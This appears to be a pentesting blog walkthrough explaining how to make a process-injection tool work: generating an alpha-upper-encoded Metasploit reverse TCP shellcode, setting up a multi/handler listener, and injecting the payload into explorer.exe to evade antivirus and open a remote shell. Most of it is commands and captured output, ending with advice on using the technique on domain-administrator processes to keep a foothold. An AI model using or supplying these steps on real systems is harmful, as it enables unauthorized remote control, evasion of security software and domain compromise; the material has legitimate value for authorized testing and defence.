A few people came to me today saying they tried this new technique and it looked awesome but was not functioning correctly, below is a description of why it was not working for them and how to fix it.. here is a link for the program as reference.
Videos are cool and all but as we know they tend to leave things out, in this case they left out the proper way to create shellcode. They also left out how to create the file to inject into the process, so below is a walkthrough without missing any details of how to get a shell by injecting into a process with injector... Honestly, I wish people who developed tools would not leave out details in their videos. I also wish they would learn to talk and explain things as they create the video rather then having a distracting song..
Mainly I believe the issues people were having are of bad character sets within their shellcode. (Although I did not verify this in a debugger, the crash behavior leans towards this assumption)
When you inject a payload into a process if any characters are bad such as a Null characters the process will automatically terminate or create undesired results, it doesn't always have to be null and all processes and programs are created differently depending what they are looking for.Encoding is a good way to solve these issues. So lets get to it!!
Original Video: http://vimeo.com/14139105
Issues people had:-Injecting into Explorer.exe crashes the process... (explorer being a good process because it re-spawns)
Resolution:-Alpha upper encoding
-using the py file to create raw code
So basically the problem people were having is that there are bad characters in their shellcode that were crashing the process, following is a step by step on how to use the antivirus bypass technique that the video does not show clearly and in its entirety....
1. First Create your shell-code: (Alpha upper encode the shellcode, and add a thread exit function)
root@Ficti0n:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 EXITFUNC=thread R | ./msfencode -e x86/alpha_upper
[*] x86/alpha_upper succeeded with size 699 (iteration=1)
The output from this will be very large but no worries size doesn't appear to be an issue....
2. Put this shell-code into the generic.py file like so (Remove all + signs and surround the output with parenthesis)
3. Startup your multi-handler and after you receive the payload you will get a shell... (go to step 4 below to send off your payload.)
msf > use multi/handler
msf exploit(handler) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.10:4444
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.10:4444 -> 192.168.1.3:2438) at Tue Aug 17 20:30:20 -0400 2010
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator> YAY FOR SHELL
4. Check your process list for Explorer.exe then ship off your payload into the process, this payload is now encoded to remove all bad characters and with your multi/handler running you should receive a shell no problem.
C:\Documents and Settings\Administrator\Desktop\injector>tasklist
Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 28 K
System 4 Console 0 244 K
smss.exe 620 Console 0 388 K
csrss.exe 668 Console 0 1,660 K
winlogon.exe 692 Console 0 5,152 K
services.exe 736 Console 0 4,312 K
lsass.exe 748 Console 0 1,544 K
vmacthlp.exe 904 Console 0 2,292 K
svchost.exe 920 Console 0 4,548 K
svchost.exe 1000 Console 0 4,012 K
svchost.exe 1092 Console 0 21,824 K
svchost.exe 1136 Console 0 3,060 K
svchost.exe 1212 Console 0 4,584 K
spoolsv.exe 1416 Console 0 5,476 K
sqlservr.exe 1800 Console 0 8,684 K
sqlwriter.exe 1948 Console 0 3,268 K
notepad++.exe 2104 Console 0 3,072 K
notepad.exe 3612 Console 0 3,388 K
explorer.exe 1568 Console 0 22,064 K
tasklist.exe 1900 Console 0 4,244 K
wmiprvse.exe 2708 Console 0 5,404 K
C:\Documents and Settings\Administrator\Desktop\injector>injector.exe pgeneric.txt 1568
[*] Author: DouBle_Zer0
[*] HACKERS GARAGE Production
[*] Visit Us: http://www.garage4hackers.com
C:\Documents and Settings\Administrator\Desktop\injector> Your payload was just sent!! check your meterpreter
I hope that clears a few things up for anyone who was asking me how to utilize this tool on a pentest, this is an excellent technique and very neat but explanation of proper payloads and examples were lacking, I would have much preferred a written write up with more detail for reference so that is what i am providing..
Final Note:Also one final note, you will notice i used the "explorer.exe" process, the reason I used explorer.exe because if I blow it up, it will respawn itself. Also a good technique when migrating processes in Meterpreter, if explorer.exe Fubars, you can just kill the process and it will respawn. I have used this technique on processes running as a domain administrator to get full domain access. However when I blew up the process I lost access but was able to just respawn it and regain my foothold when no hashes or tokens were available.